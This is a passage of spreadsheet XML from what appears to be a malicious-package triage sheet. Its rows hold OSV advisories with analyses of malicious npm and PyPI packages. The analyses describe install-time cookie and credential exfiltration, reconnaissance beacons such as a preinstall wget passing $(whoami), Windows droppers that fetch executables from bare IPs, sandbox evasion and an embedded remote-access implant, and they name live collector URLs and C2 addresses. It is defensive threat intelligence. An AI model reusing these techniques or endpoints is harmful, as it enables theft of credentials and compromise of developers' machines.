      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr">
        <is>
          <t>npm:img-to-native</t>
        </is>
      </c>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr"/>
      <c r="S67" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7676788d88c2194b8d5c048decfbe06550798ce342af54f8975bc26422d10c53)
On require() of img-to-native, index.js reads banner.jpg from the.cache directory of its sole dependency cdn-img-fetch, locates a payload appended after the PNG IEND marker, base64-decodes it, and AES-256-CBC decrypts it using a key derived from sha256('nif-runtime-2027'). The decrypted bytes are written to %LOCALAPPDATA%\Programs\NodeRuntime\node_runtime_helper.exe with mode 0o755, and the source image is then unlinked. An fs.watch fallback waits for the image to appear if it is not yet staged. The payload is obfuscated (hidden after a PNG end-of-image marker, base64-encoded, AES-encrypted), unverified (no hash or signature check), and dropped to a persistence-adjacent path with executable bits set. The advertised purpose ("convert image files to native binary representation") does not require decrypting content appended after a PNG IEND chunk to materialize a Windows executable. The companion package cdn-img-fetch is pinned as a caret range (^1.0.0), so future 1.x releases can silently change the delivered payload bytes. Installing or loading this package results in attacker-controlled code being written to the installer's filesystem with execute permission.
## Source: ghsa-malware (7131e9cb1bdeb272ae7e26f2877087fd5da8716ef7c08e0fc0bf1359e278df8e)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7" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17216</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>GHSA-w4g6-rgx4-2wjf</t>
        </is>
      </c>
      <c r="D68" s="5" t="inlineStr"/>
      <c r="E68" s="5" t="inlineStr"/>
      <c r="F68" s="5" t="inlineStr"/>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr">
        <is>
          <t>npm:my-skibidi</t>
        </is>
      </c>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr"/>
      <c r="S68" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (02c4b3433d9f819c70b6ec69fe7bcc0ae0a7ff48540e11394ea5fb8f3c49049c)
my-skibidi@1.0.2 contains top-level code in its main module that unconditionally POSTs `document.cookie` to the hardcoded remote endpoint https://c-b34596407b6d47d6.dgactf-challs.site/addPost via a `sendPost(...)` call. Any downstream web application that bundles this package will, when loaded in a user's browser, transmit that user's cookies and session data to the external host. The destination is not a first-party service and is not caller-configurable; the exfiltration runs as a side effect of loading the module. The package's declared functionality does not require reading or transmitting cookies, and no consent gate or configuration controls the behavior.
## Source: ghsa-malware (47126398a61b320eb7bbad1b71461843e4609e46f5137d735ea3d15d976c7f46)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8" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17217</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17213</t>
        </is>
      </c>
      <c r="D69" s="5" t="inlineStr"/>
      <c r="E69" s="5" t="inlineStr"/>
      <c r="F69" s="5" t="inlineStr"/>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr">
        <is>
          <t>PyPI:azure-langchain-example</t>
        </is>
      </c>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr"/>
      <c r="S69" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (1cffc3a51858b1b7a17ff0edfd2eeae6383e83b4eff5bc078f7b1d4f5ba36ad2)
On `import azure_langchain_example`, the package's __init__.py starts a background daemon thread that issues a GET request to https://litellm.adversarylabx.com/.telemetry with the installer's hostname, resolved IP address, a timestamp, and the package name in the query string, using urllib.request.urlopen with a short timeout and silenced exceptions. The destination host is unrelated to the package's advertised purpose (a minimal LangChain wrapper for Azure OpenAI) and to any Azure or LangChain publisher domain. The behavior fires unconditionally at import without user consent or opt-out and is not mentioned in the README. Package metadata is placeholder (`Your Name &lt;you@example.com&gt;`) and the name resembles the Azure+LangChain ecosystem, consistent with a lookalike used to profile installers who mistype or guess an Azure/LangChain integration package name. An in-source comment labeling the request a harmless canary is author-controlled text that does not change the observed behavior.
## Source: kam193 (59c10650dde5db077b435212025a4cb48ab69daf76022cb932dfec98beea4479)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69" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17213</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17214</t>
        </is>
      </c>
      <c r="D70" s="5" t="inlineStr"/>
      <c r="E70" s="5" t="inlineStr"/>
      <c r="F70" s="5" t="inlineStr"/>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr">
        <is>
          <t>npm, gin</t>
        </is>
      </c>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr">
        <is>
          <t>npm:git-en-boite-logging</t>
        </is>
      </c>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr"/>
      <c r="S70" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f6ebee9f4428d7f14f6f941438064715c8bece34c5fe6bfedf32bbd8cba226c0)
package.json declares a preinstall lifecycle hook that runs `wget` to a hardcoded webhook.site collector URL (https://webhook.site/3fcfa5af-1b4e-4556-9d48-26190d02795f/), passing `$(whoami)`, `$(hostname)`, and `$(pwd)` as query parameters. On `npm install`, npm invokes the preinstall script automatically, so the installer's OS username, host name, and current working directory are transmitted to an anonymous third-party webhook collector without any user action. This is the canonical dependency-confusion / reconnaissance beacon shape: an otherwise-empty package whose only on-install effect is to phone home installer identity to an attacker-chosen endpoint, typically used to confirm ingress into a target's internal build environment before staging a follow-on payload.
</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17214</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17215</t>
        </is>
      </c>
      <c r="D71" s="5" t="inlineStr"/>
      <c r="E71" s="5" t="inlineStr"/>
      <c r="F71" s="5" t="inlineStr"/>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr">
        <is>
          <t>npm, eslint, go, gin</t>
        </is>
      </c>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr">
        <is>
          <t>npm:eslint-plugin-skywagon-web</t>
        </is>
      </c>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr"/>
      <c r="S71" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (3c5d134d2e79b24ed65d2998520db05b5cc86b251ae579a6d8cec6d8fe02340f)
eslint-plugin-skywagon-web@100.0.0 ships an index.js that is executed via a preinstall lifecycle script on `npm install`. The script collects installer-side identifiers — os.hostname(), os.userInfo().username, os.homedir(), process.cwd(), dns.getServers(), and the contents of the package's package.json — and POSTs them over HTTPS to the hardcoded external collector eo1blcdjptwydyq.m.pipedream.net. A source comment ("replace burpcollaborator.net with Interactsh or pipedream") shows the file is a dependency-confusion exfiltration template repurposed as a live payload. The implausibly high version number (100.0.0) is consistent with a dependency-confusion lure intended to override an internal package of the same name during resolution.
</t>
        </is>
      </c>
      <c r="T71" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17215</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17223</t>
        </is>
      </c>
      <c r="D72" s="5" t="inlineStr"/>
      <c r="E72" s="5" t="inlineStr"/>
      <c r="F72" s="5" t="inlineStr"/>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr">
        <is>
          <t>npm:chalk-figlet</t>
        </is>
      </c>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr"/>
      <c r="S72" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (66dfb43d5f4ae643e32497447293c12170a21f258a7e7d3d07e8f90f2119e13b)
package.json declares a postinstall script (`node example.js`) that requires index.js at install time. index.js contains a function named `_syncTelemetry` that decodes a hex-obfuscated URL (`Buffer.from('687474703a...','hex')` -&gt; `http://104.234.65.75:700/setup.exe`) and a hex-obfuscated filename (`RuntimeBroker.exe`), downloads the binary over plain HTTP from a bare IP using `axios.get(..., {responseType:'stream'})` piped to `fs.createWriteStream` in `os.tmpdir()`, and executes it via `child_process.exec` with `windowsHide: true`. Execution is gated on `process.env.npm_lifecycle_event` so it fires during `npm install`. The dropped filename impersonates the legitimate Windows system binary RuntimeBroker.exe, and the package presents itself as a chalk+figlet wrapper unrelated to the observed behavior.
</t>
        </is>
      </c>
      <c r="T72" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17223</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17224</t>
        </is>
      </c>
      <c r="D73" s="5" t="inlineStr"/>
      <c r="E73" s="5" t="inlineStr"/>
      <c r="F73" s="5" t="inlineStr"/>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr">
        <is>
          <t>npm:fabric-asset-pipeline</t>
        </is>
      </c>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr"/>
      <c r="S73" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (bb92787d766d5bfa0c384cc04909689215fa0d3e869630422caa8bedd303038a)
fabric-asset-pipeline@1.0.0 declares a postinstall hook that runs index.js on npm install. index.js is heavily obfuscated (obfuscator.io-style rotated string array plus base64+RC4 decoding of identifiers and URLs, with newline/regex anti-formatting hooks) and implements a Minecraft credential stealer: functions stealLauncherAccounts(), stealAltLaunchers(), and readSessionDump() read account credential stores from the official Minecraft launcher (launcher_accounts.json / launcher_profiles.json) as well as Prism/MultiMC, TLauncher, Modrinth, PolyMC, and GDLauncher, plus a session dump from the OS temp directory. Extracted account names, access tokens, and refresh tokens are POSTed via https.request to a hardcoded webhook whose URL is RC4-decoded at runtime. A companion sendInfo() call ships os.hostname(), os.userInfo().username, os.platform()/os.release(), and the recovered Minecraft username to the same endpoint. None of this behavior is part of the package's advertised 'asset loader bridge' purpose, and the obfuscation deliberately conceals both the exfiltration functions and the destination URL.
</t>
        </is>
      </c>
      <c r="T73" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17224</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17225</t>
        </is>
      </c>
      <c r="D74" s="5" t="inlineStr"/>
      <c r="E74" s="5" t="inlineStr"/>
      <c r="F74" s="5" t="inlineStr"/>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="inlineStr"/>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr">
        <is>
          <t>npm:fabric-render-bridge</t>
        </is>
      </c>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr"/>
      <c r="S74" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c2715ef0b07fbf0ca24fb8dadec44f2fcfdc273421a49ad2201bf8e40d3e2c01)
package.json declares postinstall="node index.js", so `npm install fabric-render-bridge` automatically executes index.js. index.js reads Minecraft launcher credential stores across multiple launchers (launcher_accounts.json and launcher_profiles.json for the official launcher, PrismLauncher, MultiMC, TLauncher, Modrinth, PolyMC, GDLauncher) plus a session dump from the OS temp directory, extracts accessToken/refreshToken values and account usernames, and POSTs them via https.request to a hardcoded Discord webhook at discord.com/api/webhooks/1554065488726990909/. A separate sendInfo() routine POSTs os.hostname(), os.userInfo().username, os.platform() and os.release() to the same webhook on every install. The package presents itself as a Fabric render bridge but ships no rendering functionality; its sole install-time behavior is credential and host-identity theft.
</t>
        </is>
      </c>
      <c r="T74" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17225</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17226</t>
        </is>
      </c>
      <c r="D75" s="5" t="inlineStr"/>
      <c r="E75" s="5" t="inlineStr"/>
      <c r="F75" s="5" t="inlineStr"/>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr">
        <is>
          <t>npm:figlet-chalk-render</t>
        </is>
      </c>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr"/>
      <c r="S75" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (992cf49b88be09149971d4ac18fe2a4b61d242186f553cb3283a26970b886d7f)
The package is advertised as a chalk+figlet wrapper but index.js contains a top-level IIFE that runs on require. On Windows hosts, it reconstructs the module names 'https', 'os', 'fs', 'path', and 'child_process' and the method name 'spawn' from char-code arrays, hex escapes, and string concatenation to hide the network and execution chain. It then decodes the hardcoded plain-HTTP URL http://104.234.65.75:700/setup.exe and the filename RuntimeBroker.exe (masquerading as a legitimate Windows binary), downloads the payload into the OS temp directory via https.get piped to createWriteStream, and spawns it detached with windowsHide: true and.unref(). Execution is gated to skip environments where CI, SANDBOX, GITHUB_ACTIONS, or TRAVIS are set, evading sandbox and CI analysis. The obfuscation, bare-IP plain-HTTP delivery, RuntimeBroker.exe masquerade, and CI-evasion gate are inconsistent with the package's stated purpose and match an install/require-time Windows dropper.
</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17226</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17227</t>
        </is>
      </c>
      <c r="D76" s="5" t="inlineStr"/>
      <c r="E76" s="5" t="inlineStr"/>
      <c r="F76" s="5" t="inlineStr"/>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr">
        <is>
          <t>npm:nebula-llm</t>
        </is>
      </c>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr"/>
      <c r="S76" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b33da6aef41209f654f8f76cc56074a7b827599f42f941e3917326da1f4d2566)
The npm package nebula-llm@1.0.0 ships a preinstall lifecycle script (preinstall.cjs) that embeds a ~257KB Windows PE binary as a base64+zlib-compressed string literal. On `npm install` on Windows, the script decompresses the blob, writes it to %LOCALAPPDATA%\Microsoft\Conhost\conhost.exe — impersonating the legitimate Windows Console Host binary — and spawns it detached with stdio ignored and windowsHide:true, then unrefs the child so it survives the install process. The decoded PE contains a.kntrat section and references github.com/syskiel/kntrat-e and IP 65.87.7.132, consistent with a persistent remote-access implant. Installation therefore executes an opaque author-supplied executable on the installer's host with no user interaction and no purpose related to any documented package function.
</t>
        </is>
      </c>
      <c r="T76" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17227</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17228</t>
        </is>
      </c>
      <c r="D77" s="5" t="inlineStr"/>
      <c r="E77" s="5" t="inlineStr"/>
      <c r="F77" s="5" t="inlineStr"/>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr">
        <is>
          <t>npm:nebulaai-sdk</t>
        </is>
      </c>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr"/>
      <c r="S77" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (dc906b81107141fbd85dcabf89fd2f5112c4e4a134045c90d6a35abb4b67d16e)
The package's `preinstall.js` contains a base64+zlib-encoded 257 KB Windows PE executable. On `npm install` on Windows, the script decodes the blob and writes it to `%LOCALAPPDATA%\Microsoft\Conhost\conhost.exe` — a path and filename that impersonates a legitimate Windows console host binary — then spawns it via `child_process.spawn` with `detached: true`, `stdio: 'ignore'`, and `windowsHide: true`, so execution is silent and survives the npm process. The decoded PE contains a section named `.kntrat` and references the external host `65.87.7.132` and the repository `github.com/syskiel/kntrat-e`, indicating remote command-and-control functionality (RAT-shaped naming). The package has no legitimate SDK functionality visible; the preinstall hook exists solely to stage and run the embedded executable. Installing this package on a Windows host results in full arbitrary code execution under the installing user, with a masqueraded persistent binary staged under LOCALAPPDATA and a C2 endpoint reachable at 65.87.7.132.
</t>
        </is>
      </c>
      <c r="T77" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17228</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17229</t>
        </is>
      </c>
      <c r="D78" s="5" t="inlineStr"/>
      <c r="E78" s="5" t="inlineStr"/>
      <c r="F78" s="5" t="inlineStr"/>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr">
        <is>
          <t>npm:simple-date-formatter-new-12</t>
        </is>
      </c>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr"/>
      <c r="S78" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (bd79db99adb8878673dd85db5a29661432808fa8fcc5e3d750b907418df8ae5f)
npm package simple-date-formatter-new-12@1.0.0 declares a postinstall lifecycle script in package.json that runs automatically on `npm install`. The script uses curl to fetch an internal Baidu host (http://bsrc-ssrf.n.baidu-int.com/...), writes the response to /tmp/bsrc.txt, and POSTs the contents to an attacker-controlled interactsh collector at pdxkwzizhzzdpzpgcieqk6d1v7ynqsgfo.oast.fun/bsrc. The package's advertised purpose is a trivial date-formatting wrapper (index.js exports a single formatDate function); the SSRF probe and outbound exfiltration are unrelated to that purpose. The name shape (`simple-date-formatter-new-12`), empty author metadata, and OAST beacon are consistent with a dependency-confusion / typosquat probe designed to detect installation inside a target organization and leak internal network responses reachable from the installer's network position to a third-party collector.
</t>
        </is>
      </c>
      <c r="T78" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17229</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17230</t>
        </is>
      </c>
      <c r="D79" s="5" t="inlineStr"/>
      <c r="E79" s="5" t="inlineStr"/>
      <c r="F79" s="5" t="inlineStr"/>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr">
        <is>
          <t>npm:llm-nebula</t>
        </is>
      </c>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr"/>
      <c r="S79" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (0eee293a9973027154eea71635c14e8a4cb2ad8a1e4f80a65399ad874afcb669)
